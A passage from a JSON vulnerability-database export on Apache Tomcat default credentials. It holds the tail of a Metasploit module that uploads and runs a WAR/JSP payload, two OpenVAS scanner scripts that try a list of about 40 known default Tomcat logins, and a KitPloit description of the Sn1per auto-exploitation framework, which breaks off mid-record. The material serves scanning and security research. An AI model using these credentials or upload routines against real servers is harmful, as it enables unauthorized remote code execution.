rand_text_numeric(28)\r\n\r\n res = send_request_cgi({\r\n 'uri' => url,\r\n 'method' => 'POST',\r\n 'ctype' => 'multipart/form-data; boundary=---------------------------' + boundary_identifier,\r\n 'user' => datastore['USERNAME'],\r\n 'password' => datastore['PASSWORD'],\r\n 'cookie' => @session_id,\r\n 'vars_get' => vars_get,\r\n 'data' => generate_multipart_msg(boundary_identifier, war),\r\n })\r\n\r\n return res\r\n end\r\n\r\n def send_request_undeploy(url)\r\n res = send_request_cgi({\r\n 'uri' => url,\r\n 'vars_get' => vars_get,\r\n 'method' => 'POST',\r\n 'user' => datastore['USERNAME'],\r\n 'password' => datastore['PASSWORD'],\r\n 'cookie' => @session_id\r\n })\r\n\r\n return res\r\n end\r\n\r\n def access_manager?\r\n res = query_manager\r\n return false unless res and res.code == 200\r\n @session_id = res.get_cookies\r\n @csrf_token = find_csrf(res)\r\n return true\r\n end\r\n\r\n def upload_payload\r\n war = war_payload\r\n upload_path = normalize_uri(target_uri.path.to_s, \"html\", \"upload\")\r\n vprint_status(\"#{peer} - Uploading #{war.length} bytes as #{@app_base}.war ...\")\r\n res = send_war_payload(upload_path, war)\r\n return parse_upload_response(res)\r\n end\r\n\r\n def parse_upload_response(res)\r\n unless res\r\n vprint_error(\"#{peer} - Upload failed on #{upload_path} [No Response]\")\r\n return false\r\n end\r\n\r\n if res.code < 200 or res.code >= 300\r\n vprint_warning(\"Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}\") if res.code == 401\r\n vprint_error(\"Upload failed on #{upload_path} [#{res.code} #{res.message}]\")\r\n return false\r\n end\r\n\r\n return true\r\n end\r\n\r\n def execute_payload\r\n jsp_path = normalize_uri(@app_base, \"#{@jsp_name}.jsp\")\r\n\r\n vprint_status(\"#{peer} - Executing #{jsp_path}...\")\r\n\r\n res = send_request_cgi({\r\n 'uri' => jsp_path,\r\n 'method' => 'GET'\r\n })\r\n\r\n return parse_execute_response(res)\r\n end\r\n\r\n def parse_execute_response(res)\r\n unless res\r\n vprint_error(\"#{peer} - Execution failed on #{@app_base} [No Response]\")\r\n return false\r\n end\r\n\r\n if res and (res.code < 200 or res.code >= 300)\r\n vprint_error(\"#{peer} - Execution failed on #{@app_base} [#{res.code} #{res.message}]\")\r\n return false\r\n end\r\n\r\n return true\r\n end\r\n\r\n def undeploy_app\r\n undeploy_url = normalize_uri(target_uri.path.to_s, \"html\", \"undeploy\")\r\n res = send_request_undeploy(undeploy_url)\r\n\r\n unless res\r\n vprint_warning(\"#{peer} - WARNING: Undeployment failed on #{undeploy_url} [No Response]\")\r\n return false\r\n end\r\n\r\n if res and (res.code < 200 or res.code >= 300)\r\n vprint_warning(\"#{peer} - Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]\")\r\n return false\r\n end\r\n\r\n return true\r\n end\r\n\r\nend\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/21853", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-05-12T17:29:36", "description": "The Apache Tomcat Manager/Host Manager/Server Status is using default or known\n hardcoded credentials.", "cvss3": {}, "published": "2012-08-22T00:00:00", "type": "openvas", "title": "Apache Tomcat Manager/Host Manager/Server Status Default/Hardcoded Credentials", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-4188", "CVE-2010-4094", "CVE-2009-3843", "CVE-2009-3099", "CVE-2010-0557", "CVE-2009-4189", "CVE-2009-3548"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310103550", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103550", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Tomcat Manager Remote Unauthorized Access Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tomcat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103550\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2010-4094\", \"CVE-2009-3548\", \"CVE-2009-4189\", \"CVE-2009-3099\", \"CVE-2009-3843\",\n \"CVE-2009-4188\", \"CVE-2010-0557\");\n script_bugtraq_id(44172, 36954, 79264, 79351, 37086, 36258, 38084);\n script_name(\"Apache Tomcat Manager/Host Manager/Server Status Default/Hardcoded Credentials\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-08-22 17:19:15 +0200 (Wed, 22 Aug 2012)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_ATTACK);\n script_family(\"Default Accounts\");\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_tomcat_consolidation.nasl\", \"gb_default_credentials_options.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"apache/tomcat/http/detected\", \"ApacheTomcat/auth_required\");\n script_exclude_keys(\"default_credentials/disable_default_account_checks\");\n\n script_xref(name:\"URL\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-10-214/\");\n script_xref(name:\"URL\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-09-085/\");\n\n script_tag(name:\"solution\", value:\"Change the password to a strong one or remove the user from tomcat-users.xml.\");\n\n script_tag(name:\"summary\", value:\"The Apache Tomcat Manager/Host Manager/Server Status is using default or known\n hardcoded credentials.\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to upload and execute arbitrary\n code, which will facilitate a complete compromise of the affected computer.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n script_timeout(600);\n\n exit(0);\n}\n\nif( get_kb_item( \"default_credentials/disable_default_account_checks\" ) )\n exit( 0 );\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE, service:\"www\" ) )\n exit( 0 );\n\nif( ! dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\n# nb: Keep in sync with 2015/sw_tomcat_admin_default_credentials.nasl\ncredentials = make_list( \"admin:admin\", # Taken from various example files / documentations as well as from https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown and https://www.ikkisoft.com/stuff/TomcatSec_LucaCarettoni.pdf\n \"admin:changethis\",\n \"admin:password\",\n \"admin:Password1\",\n \"admin:password1\",\n \"admin:vagrant\",\n \"both:tomcat\",\n \"manager:manager\",\n \"password:password\",\n \"role:changethis\",\n \"role1:role1\",\n \"role1:tomcat\",\n \"role1:tomcat7\",\n \"root:changethis\",\n \"root:password\",\n \"root:Password1\",\n \"root:password1\",\n \"root:r00t\",\n \"root:root\",\n \"root:toor\",\n \"scott:tiger\", # Oracle freaks\n \"tomcat:admin\",\n \"tomcat:changethis\",\n \"tomcat:j5Brn9\", # Sun Solaris installation\n \"tomcat:none\",\n \"tomcat:password\",\n \"tomcat:Password1\",\n \"tomcat:password1\",\n \"tomcat:tomcat\",\n \"ADMIN:ADMIN\", # https://nvd.nist.gov/vuln/detail/CVE-2010-4094\n \"admin:none\", # https://nvd.nist.gov/vuln/detail/CVE-2009-3548\n \"admin:tomcat\", # https://github.com/seshendra/vagrant-ubuntu-tomcat7/blob/abd0a6c9cf08f8db642bde33ce7491259247ce18/manifests/default.pp#L49-L50\n \"ovwebusr:OvW*busr1\", # https://nvd.nist.gov/vuln/detail/CVE-2009-4189, https://nvd.nist.gov/vuln/detail/CVE-2009-3099 and https://nvd.nist.gov/vuln/detail/CVE-2009-3843\n \"j2deployer:j2deployer\", # https://nvd.nist.gov/vuln/detail/CVE-2009-4188\n \"tomcat:s3cret\", # https://github.com/apache/tomcat/blob/2b8f9665dbfb89c78878784cd9b63d2b976ba623/webapps/manager/WEB-INF/jsp/403.jsp#L66\n \"cxsdk:kdsxc\", # https://nvd.nist.gov/vuln/detail/CVE-2010-0557\n \"xampp:xampp\", # XAMPP from https://www.apachefriends.org/index.html\n \"QCC:QLogic66\", # QLogic QConvergeConsole from http://www.qlogic.com/\n \"root:owaspbwa\", # OWASP Broken Web Applications Project\n \"fhir:FHIRDefaultPassword\" ); # HAPI FHIR from http://hapifhir.io/\n\n# nb: This is expected to be here, the port will be added with a later call...\nhost = http_host_name( dont_add_port:TRUE );\n\nvuln = FALSE;\nreport = \"\"; # nb: To make openvas-nasl-lint happy...\n\n# nb: Set by gb_apache_tomcat_consolidation.nasl\nauthRequireUrls = get_kb_list( \"www/\" + host + \"/\" + port + \"/ApacheTomcat/auth_required\" );\nif( isnull( authRequireUrls ) )\n exit( 0 );\n\n# Sort to not report changes on delta reports if just the order is different\nauthRequireUrls = sort( authRequireUrls );\n\nuseragent = http_get_user_agent();\nhost = http_host_name( port:port );\n\nforeach url( authRequireUrls ) {\n\n foreach credential( credentials ) {\n\n user_pass = split( credential, sep:\":\", keep:FALSE );\n\n user = chomp( user_pass[0] );\n pass = chomp( user_pass[1] );\n\n if( tolower( pass ) == \"none\" ) pass = \"\";\n\n userpass = string( user, \":\", pass );\n userpass64 = base64( str:userpass );\n\n req = string( \"GET \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Authorization: Basic \", userpass64, \"\\r\\n\",\n \"\\r\\n\" );\n res = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( res =~ \"^HTTP/1\\.[01] 200\" && \"Tomcat Web Application Manager\" >< res ) {\n report += \"It was possible to login into the Tomcat Manager at \" + http_report_vuln_url( port:port, url:url, url_only:TRUE ) + ' using user \"' + user + '\" with password \"' + pass + '\"\\n\\n';\n vuln = TRUE;\n } else if( res =~ \"^HTTP/1\\.[01]\" && \"Tomcat Virtual Host Manager\" >< res ) {\n report += \"It was possible to login into the Tomcat Host Manager at \" + http_report_vuln_url( port:port, url:url, url_only:TRUE ) + ' using user \"' + user + '\" with password \"' + pass + '\"\\n\\n';\n vuln = TRUE;\n } else if( res =~ \"^HTTP/1\\.[01]\" && \"Server Status\" >< res && \"Complete Server Status\" >< res ) {\n report += \"It was possible to login into the Tomcat Server Status at \" + http_report_vuln_url( port:port, url:url, url_only:TRUE ) + ' using user \"' + user + '\" with password \"' + pass + '\"\\n\\n';\n vuln = TRUE;\n }\n }\n}\n\nif( vuln ) {\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-12T17:23:53", "description": "The Apache Tomcat Server Administration is using default or known\n hardcoded credentials.", "cvss3": {}, "published": "2015-04-10T00:00:00", "type": "openvas", "title": "Apache Tomcat Server Administration Default/Hardcoded Credentials", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-4188", "CVE-2010-4094", "CVE-2009-3843", "CVE-2009-3099", "CVE-2010-0557", "CVE-2009-4189", "CVE-2009-3548"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310111013", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310111013", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Tomcat Server Administration Unauthorized Access Vulnerability\n#\n# Authors:\n# Christian Fischer <info@schutzwerk.com>\n#\n# Copyright:\n# Copyright (C) 2015 SCHUTZWERK GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tomcat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.111013\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2010-4094\", \"CVE-2009-3548\", \"CVE-2009-4189\", \"CVE-2009-3099\", \"CVE-2009-3843\",\n \"CVE-2009-4188\", \"CVE-2010-0557\");\n script_bugtraq_id(44172, 36954, 79264, 79351, 37086, 36258, 38084);\n script_name(\"Apache Tomcat Server Administration Default/Hardcoded Credentials\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-04-10 15:00:00 +0200 (Fri, 10 Apr 2015)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_ATTACK);\n script_family(\"Default Accounts\");\n script_copyright(\"Copyright (C) 2015 SCHUTZWERK GmbH\");\n script_dependencies(\"gb_apache_tomcat_consolidation.nasl\", \"gb_default_credentials_options.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"apache/tomcat/http/detected\");\n script_exclude_keys(\"default_credentials/disable_default_account_checks\");\n\n script_xref(name:\"URL\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-10-214/\");\n script_xref(name:\"URL\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-09-085/\");\n\n script_tag(name:\"solution\", value:\"Change the password to a strong one or remove the user from tomcat-users.xml.\");\n\n script_tag(name:\"summary\", value:\"The Apache Tomcat Server Administration is using default or known\n hardcoded credentials.\");\n\n script_tag(name:\"impact\", value:\"This issue may be exploited by a remote attacker to gain\n access to sensitive information.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n script_timeout(600);\n\n exit(0);\n}\n\nif( get_kb_item( \"default_credentials/disable_default_account_checks\" ) )\n exit( 0 );\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE, service:\"www\" ) )\n exit( 0 );\n\nif( ! dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\nreq = http_get( item:\"/admin/\", port:port );\nres = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\ncookie = eregmatch( pattern:\"JSESSIONID=([0-9A-Z]+);\", string:res );\nif( isnull( cookie[1] ) )\n exit( 0 );\n\nif( \"Tomcat Server Administration\" >!< res )\n exit( 0 );\n\n# nb: Keep in sync with 2012/gb_tomcat_default_credentials.nasl\ncredentials = make_list( \"admin:admin\", # Taken from various example files / documentations as well as from https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown and https://www.ikkisoft.com/stuff/TomcatSec_LucaCarettoni.pdf\n \"admin:changethis\",\n \"admin:password\",\n \"admin:Password1\",\n \"admin:password1\",\n \"admin:vagrant\",\n \"both:tomcat\",\n \"manager:manager\",\n \"password:password\",\n \"role:changethis\",\n \"role1:role1\",\n \"role1:tomcat\",\n \"role1:tomcat7\",\n \"root:changethis\",\n \"root:password\",\n \"root:Password1\",\n \"root:password1\",\n \"root:r00t\",\n \"root:root\",\n \"root:toor\",\n \"scott:tiger\", # Oracle freaks\n \"tomcat:admin\",\n \"tomcat:changethis\",\n \"tomcat:j5Brn9\", # Sun Solaris installation\n \"tomcat:none\",\n \"tomcat:password\",\n \"tomcat:Password1\",\n \"tomcat:password1\",\n \"tomcat:tomcat\",\n \"ADMIN:ADMIN\", # https://nvd.nist.gov/vuln/detail/CVE-2010-4094\n \"admin:none\", # https://nvd.nist.gov/vuln/detail/CVE-2009-3548\n \"admin:tomcat\", # https://github.com/seshendra/vagrant-ubuntu-tomcat7/blob/abd0a6c9cf08f8db642bde33ce7491259247ce18/manifests/default.pp#L49-L50\n \"ovwebusr:OvW*busr1\", # https://nvd.nist.gov/vuln/detail/CVE-2009-4189, https://nvd.nist.gov/vuln/detail/CVE-2009-3099 and https://nvd.nist.gov/vuln/detail/CVE-2009-3843\n \"j2deployer:j2deployer\", # https://nvd.nist.gov/vuln/detail/CVE-2009-4188\n \"tomcat:s3cret\", # https://github.com/apache/tomcat/blob/2b8f9665dbfb89c78878784cd9b63d2b976ba623/webapps/manager/WEB-INF/jsp/403.jsp#L66\n \"cxsdk:kdsxc\", # https://nvd.nist.gov/vuln/detail/CVE-2010-0557\n \"xampp:xampp\", # XAMPP from https://www.apachefriends.org/index.html\n \"QCC:QLogic66\", # QLogic QConvergeConsole from http://www.qlogic.com/\n \"root:owaspbwa\", # OWASP Broken Web Applications Project\n \"fhir:FHIRDefaultPassword\" ); # HAPI FHIR from http://hapifhir.io/\n\nvuln = FALSE;\nreport = \"\";\n\nhost = http_host_name( port:port );\nuseragent = http_get_user_agent();\nforeach credential( credentials ) {\n\n user_pass = split( credential, sep:\":\", keep:FALSE );\n\n user = chomp( user_pass[0] );\n pass = chomp( user_pass[1] );\n\n if( tolower( pass ) == \"none\" ) pass = \"\";\n\n data = string( \"j_username=\" + user + \"&j_password=\" + pass );\n len = strlen( data );\n\n req = 'POST /admin/j_security_check;jsessionid=' + cookie[1] + ' HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n' +\n 'Accept-Language: en-US,en;q=0.5\\r\\n' +\n 'Referer: http://' + host + '/admin/\\r\\n' +\n 'Cookie: JSESSIONID=' + cookie[1] + '\\r\\n' +\n 'Connection: keep-alive\\r\\n' +\n 'Content-Type: application/x-www-form-urlencoded\\r\\n' +\n 'Content-Length: ' + len + '\\r\\n' +\n '\\r\\n' +\n data;\n res = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( res =~ \"^HTTP/1\\.[01] 302\" && \"/admin/\" >< res ) {\n\n req = 'GET /admin/ HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n' +\n 'Accept-Language: en-US,en;q=0.5\\r\\n' +\n 'Referer: http://' + host + '/admin/\\r\\n' +\n 'Cookie: JSESSIONID=' + cookie[1] + '\\r\\n' +\n 'Connection: keep-alive\\r\\n' +\n '\\r\\n';\n res = http_keepalive_send_recv( port:port, data:req );\n\n req = 'GET /admin/banner.jsp HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n' +\n 'Accept-Language: en-US,en;q=0.5\\r\\n' +\n 'Referer: http://' + host + '/admin/\\r\\n' +\n 'Cookie: JSESSIONID=' + cookie[1] + '\\r\\n' +\n 'Connection: keep-alive\\r\\n' +\n '\\r\\n';\n res = http_keepalive_send_recv( port:port, data:req );\n\n if( \"/admin/commitChanges.do\" >< res ) {\n report += \"It was possible to login into the Tomcat Server Administration at \" + http_report_vuln_url( port:port, url:\"/admin/index.jsp\", url_only:TRUE ) + ' using user \"' + user + '\" with password \"' + pass + '\"';\n vuln = TRUE;\n }\n }\n}\n\nif( vuln ) {\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2023-12-04T15:31:07", "description": "[](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n**Categorized host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Personalized notes field for each host** \n \n\n\n[](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n**DEMO VIDEO:** \n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**AUTO-PWN:** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600\n * GPON Router RCE CVE-2018-10561\n * [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638\n * Apache Struts 2 RCE CVE-2017-9805\n * Apache Jakarta RCE CVE-2017-5638\n * Shellshock GNU Bash RCE CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * Default Apache Tomcat Creds CVE-2009-3843\n * MS Windows SMB RCE MS08-067\n * Webmin File Disclosure CVE-2006-3392\n * [Anonymous FTP](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access\n * PHPMyAdmin Backdoor RCE\n * PHPMyAdmin Auth Bypass\n * JBoss Java De-Serialization RCE's\n \n**KALI LINUX INSTALL:** \n\n \n \n ./install.sh\n\n \n**DOCKER INSTALL:** \nCredits: @menzow \nDocker Install: <https://github.com/menzow/sn1per-docker> \nDocker Build: <https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/> \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp &amp; 443/tcp only). Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **UPDATE:** Checks for updates and upgrades all components used by sniper.\n * **REIMPORT:** Reimport all workspace files into Metasploit and reproduce all reports.\n * **RELOAD:** Reload the master workspace report.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per v5.0](<https://github.com/1N3/Sn1per>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-11-24T12:43:00", "type": "kitploit", "title": "Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": 